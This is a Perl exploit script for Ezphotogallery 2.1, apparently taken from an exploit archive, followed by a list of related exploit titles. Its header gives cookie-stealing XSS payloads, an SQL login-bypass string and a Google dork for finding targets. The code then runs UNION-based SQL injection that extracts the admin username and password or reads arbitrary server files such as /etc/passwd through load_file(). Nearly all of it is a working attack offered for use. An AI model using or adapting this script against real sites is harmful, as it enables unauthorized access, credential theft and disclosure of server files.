#!/usr/bin/perl

#----------------------------------------------------------------

#

#Script : Ezphotogallery 2.1

#

#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)

#

#Method : GET

#

#Alert : High

#

#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="

#

#----------------------------------------------------------------

#

#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

#

#My Official Website : HTTP://FEREIDANI.IR

#

#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

#

#----------------------------------------------------------------

#

#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR

#

#----------------------------------------------------------------

#

#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip

#

#----------------------------------------------------------------

#Xss Vulnerabilities :

#

#Xss 1 : gallery.php?galleryid=<script>alert(document.cookie)</script>

#Xss 2 : show.php?imageid=156&size="''<?>>""''<script>alert(document.cookie)</script>

#Xss 3 : show.php?imageid=<script>alert(document.cookie)</script>

#

#----------------------------------------------------------------

#Login Bypass :

#

#Insert in gallery.php

#

#User : admin ' or ' 1=1

#Password : Dr.Crash

#

#----------------------------------------------------------------

#Sql Injection :

#

#Injection 1 : show.php?imageid=<sql>

#----------------------------------------------------------------

#

# Tnx : God

#

# HTTP://IRCRASH.COM

#

#---------------------------------------------------------------- use LWP;

use HTTP::Request;

use Getopt::Long;

$scriptname="Ezphotogallery 2.1"; sub header

{

print "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************";

} sub usage

{

print "

* Usage : perl $0 http://Example/

****************************************************

";

}

$url = ($ARGV[0]); if(!$url)

{

header();

usage();

exit;

}

if($url !~ ///){$url = $url."/";}

if($url !~ /http:///){$url = "http://".$url;}

sub xpl1()

{

#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)

$vul = "/show.php?imageid=999 union select 0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9 from users/*";

$requestpage = $url.$vul;

my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type('application/x-www-form-urlencoded');

$req->header("content-length" => $contlen);

$req->content($poststring); $response = $ua->request($req);

$content = $response->content;

$header = $response->headers_as_string(); @name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0]; @password = split(/Password:/,$content);

$password = @password[1];

@password = split(/<endpass>/,$password);

$password = @password[0]; if(!$name && !$password)

{

print "nn";

print "!Exploit failed ! :(nn";

exit;

} print "n Username: ".$name."nn";

print " Password: " .$password."nn";

}

#XPL2 sub xpl2()

{

print "n Example For File Address : /home/user/public_html/config.phpn Or /etc/passwd";

print "n Enter File Address :";

$fil3 = <stdin>; $vul = "/show.php?imageid=999 union select 0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9 from users/*";

$requestpage = $url.$vul; my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type('application/x-www-form-urlencoded');

$req->header("content-length" => $contlen);

$req->content($poststring); $response = $ua->request($req);

$content = $response->content;

$header = $response->headers_as_string();

@name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0];

if(!$name && !$password)

{

print "nn";

print "!Exploit failed ! :(nn";

exit;

} open (FILE, ">".source.".txt");

print FILE $name;

close (FILE);

print " File Save In source.txtn";

print ""; } #XPL2 END

#Starting;

print "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************

* Mod Options : *

* Mod 1 : Find Script username and password *

* Mod 2 : File Disclosure mode *

****************************************************";

print "n n Enter Mod : ";

$mod=<stdin>;

if ($mod=="1" or $mod=="2") { print "n Exploiting .............. n"; } else { print "n Unknown Mod ! n Exploit Failed !"; };

if ($mod=="1") { xpl1(); };

if ($mod=="2") { xpl2(); };

【Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit】相关文章：

★ webEdition CMS (we_objectID) Blind SQL Injection Exploit

★ Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

★ AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

★ BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

★ The Personal FTP Server 6.0f RETR Denial of Service Exploit

★ IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

★ Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

★ NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

★ Dana IRC 1.4a Remote Buffer Overflow Exploit

★ Joomla Component DT Register Remote SQL injection Vulnerability